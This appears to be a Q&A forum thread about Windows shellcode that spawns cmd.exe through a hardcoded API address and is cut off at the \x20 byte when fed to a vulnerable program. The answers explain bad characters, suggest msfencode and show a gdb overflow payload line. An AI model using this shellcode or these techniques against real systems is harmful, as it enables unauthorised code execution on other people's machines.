shellcode is truncated by \x20

Question

Why is my shellcode is truncated after \x20 opcode, when it is copied by string to stack on a second vulnerable program?

--cmd.exe--
 char shell[]=

"\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space 
"\xc7\x44\x24\x08\x63\x6d\x64\x2e"
"\x31\xc0"
"\x89\x44\x24\x04"
"\x8d\x44\x24\x08"
"\x89\x04\x24"
"\x8d\x05\xad\x23\x86\x7c"
"\xff\xd0";
--end shell--

Answer 1

Are you passing this shellcode as a command-line argument? In that case, take a look at the ASCII code for 0x20 ;)

Answer 2

My theory is that things like quote, space, null, etc are being interpreted by the windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try metasploit's msfencode utility to avoid those opcodes altogether. I know null (/x00), space (/x20) and quote (/x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.

That's my solution, but does anyone know of any other ones that are better?

Answer 3

Put a double quotations around the entire command. For example, run:

"$shellcode" (gdb)r "$(python -c 'print "\x41" * 100 + "\x20\x83\x04\x08" + ....')"

Answer 4

\x20 like <space> in ASCII format